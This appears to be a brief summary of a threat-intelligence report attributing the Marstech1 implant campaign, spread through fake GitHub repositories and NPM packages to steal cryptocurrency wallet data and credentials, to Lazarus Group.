Operation-Marstech-Mayhem-Report_021025_03.pdf (2 MB)

SecurityScorecard’s STRIKE team attributes Operation Marstech Mayhem to Lazarus Group and describes Marstech1 as an implant aimed at software developers and cryptocurrency wallets through manipulated open-source repositories. Attackers used fake GitHub repositories and NPM packages with legitimate-looking projects that execute obfuscated JavaScript payloads when cloned and run, with promotion on developer platforms such as LinkedIn and Discord. Marstech1 reportedly downloads additional payloads based on system configuration, persists in developer environments, and exfiltrates cryptocurrency wallet data and authentication credentials from wallets including Exodus, Atomic, and MetaMask across Windows, macOS, and Linux. The campaign uses Base85 encoding, XOR decryption, control-flow flattening, self-invoking functions, anti-debugging features, and C2 servers on port 3000 running Node.js Express backends, with STRIKE reporting 233 confirmed victims across the U.S., Europe, and Asia.